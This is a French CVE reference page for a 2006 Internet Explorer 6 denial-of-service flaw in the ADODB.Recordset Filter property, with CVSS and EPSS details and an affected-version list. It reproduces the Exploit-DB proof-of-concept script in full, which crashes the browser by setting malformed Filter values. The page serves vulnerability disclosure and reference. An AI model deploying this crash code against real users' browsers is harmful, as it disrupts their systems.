Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 28145
Date de publication : 2006-07-02 22h00 +00:00
Auteur : hdm
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/18773/info
Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'ADODB.Recordset Filter Property' COM object.
A successful attack may cause the browser to fail due to a null-pointer dereference.
# Microsoft Internet Explorer ADODB.Recordset Filter Property poc
<script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
var SymRealWinOpen = window.open;
function SymWinOpen(url, name, attributes)
{
return (new Object());
}
window.open = SymWinOpen;
//-->
</script>
<script>
// MoBB Demonstration
function Demo() {
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "BBBB" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
</body></html>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;
function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}
function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;
//-->
</script>
Products Mentioned
Configuraton 0
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6
Microsoft>>Ie >> Version 6.0
Microsoft>>Ie >> Version 6.0
Microsoft>>Ie >> Version 6.0
Microsoft>>Ie >> Version 6.0
Microsoft>>Internet_explorer >> Version 6
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 6.0.2600
Microsoft>>Internet_explorer >> Version 6.0.2800
Microsoft>>Internet_explorer >> Version 6.0.2800.1106
Microsoft>>Internet_explorer >> Version 6.0.2900.2180
Canon>>Network_camera_server_vb101 >> Version *
Références